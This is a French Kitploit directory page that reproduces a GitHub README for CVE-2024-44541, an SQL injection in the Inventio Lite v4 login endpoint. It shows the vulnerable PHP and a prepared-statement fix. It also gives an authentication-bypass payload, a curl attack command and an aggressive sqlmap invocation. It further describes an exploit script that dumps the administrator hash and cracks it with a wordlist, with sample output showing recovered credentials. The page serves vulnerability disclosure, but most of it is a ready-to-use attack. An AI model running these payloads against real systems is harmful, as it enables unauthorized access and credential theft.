Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-44541 — Ce dépôt détaille une vulnérabilité d'injection SQL dans Inventio Lite v4, y compris les étapes d'exploitation et un script Python pour automatiser l'attaque. Il fournit des informations sur le code vulnérable, les correctifs recommandés et comment extraire et déchiffrer les identifiants administratifs. | Kitploit
Outils/GitHubGitHub/pointedsec/cve-2024-44541
Cassage de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubpointedsec/cve-2024-44541

CVE-2024-44541

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Ce dépôt détaille une vulnérabilité d'injection SQL dans Inventio Lite v4, y compris les étapes d'exploitation et un script Python pour automatiser l'attaque. Il fournit des informations sur le code vulnérable, les correctifs recommandés et comment extraire et déchiffrer les identifiants administratifs.

8il y a 1 anPas encore vérifié
Partager

CVE-2024-44541: Vulnérabilité d'injection SQL dans Inventio Lite v4

Description

Inventio Lite v4 est vulnérable à l'injection SQL (SQLi) dans le point de terminaison /action=processlogin. Cette vulnérabilité permet à un attaquant d'injecter des requêtes SQL arbitraires via le paramètre username dans les requêtes POST, ce qui peut conduire à un accès non autorisé et à une extraction de données.

Code vulnérable

Le code vulnérable est le suivant :

root@kitploit:~
if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();
    $sql = "select * from user where (email= \"".$user."\" or username= \"".$user."\") and password= \"".$pass."\" and is_active=1";
    $query = $con->query($sql);
    $found = false;
    $userid = null;
    while($r = $query->fetch_array()){
        $found = true;
        $userid = $r['id'];
    }
}

Capture d'écran du code vulnérable : Code vulnérable

Code corrigé

Le problème est corrigé en utilisant des requêtes préparées :

root@kitploit:~
if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();

    // Prepare the query
    $stmt = $con->prepare("
        SELECT * FROM user 
        WHERE (email = ? OR username = ?) 
        AND password = ? 
        AND is_active = 1
    ");

    // Bind parameters
    $stmt->bind_param("sss", $user, $user, $pass);

    // Execute query
    $stmt->execute();

    // Get result
    $result = $stmt->get_result();
    $found = false;
    $userid = null;

    while($r = $result->fetch_assoc()){
        $found = true;
        $userid = $r['id'];
    }

    // Close statement
    $stmt->close();
}

Exploitation

Charge utile pour contournement d'authentification

Pour exploiter cette vulnérabilité, utilisez la charge utile suivante :

root@kitploit:~
user -> ") or 1=1-- - 
pass -> blablalba

Exemple d'attaque avec curl :

root@kitploit:~
$ curl -X POST http://192.168.1.51/inventio-lite/?action=processlogin -d 'username=%22%29%20or%201%3D1--%20-&password=blablabla' -v && echo ""

Exemple avec SQLMap

root@kitploit:~
$ sqlmap -u http://192.168.1.51/inventio-lite/?action=processlogin --data="username=*&password=*" --level 5 --risk 3 --dbms=mysql --dbs --prefix='")' --batch --dbs

Script d'exploitation

Pour automatiser l'exploitation et l'extraction du nom d'utilisateur et du hachage du mot de passe de l'administrateur, vous pouvez utiliser le script Python fourni, sqli.py.

Vous pouvez cloner ce dépôt :

root@kitploit:~
git clone https://github.com/pointedsec/CVE-2024-44541

Installez ensuite les dépendances avec pip :

root@kitploit:~
pip install -r requirements.txt

Modifiez les variables suivantes dans le script selon vos besoins :

  • BASE_URL = "http://192.168.1.51/inventio-lite/"
  • PWD_DIC_PATH = "/usr/share/wordlists/rockyou.txt"

Exécutez le script, qui extraira le nom d'utilisateur et le hachage de l'administrateur, puis tentera de casser le hachage avec le format SHA1(MD5(password)).

Exemple de sortie :

root@kitploit:~
$ python3 sqli.py 
[*] Checking if target is vulnerable
[+] Target Vulnerable!
[*] Dumping Administrator username...
[◤] Extracting Username: -> [email protected]
[/] Extracting Admin Password Hash: Final Admin Hash: 90b9aa7e25f80cf4f64e990b78a9fc5ebd6cecad
[+] Password Decrypted! -> [email protected]:admin
[*] Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations

Impact

Confidentialité : Les attaquants peuvent vider l'intégralité de la base de données, exposant des données sensibles telles que les identifiants des utilisateurs et leurs informations personnelles.

Intégrité : Les attaquants peuvent contourner l'authentification et obtenir un accès administrateur, leur permettant de modifier ou de supprimer des données.

Références

  • Dépôt GitHub Inventio Lite
  • https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-44541
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44541
  • https://nvd.nist.gov/vuln/detail/CVE-2024-44541

Crédits

Ce rapport de vulnérabilité a été identifié par Andrés Del Cerro. Pour plus de détails, veuillez me contacter à [email protected]

Télécharger l’outil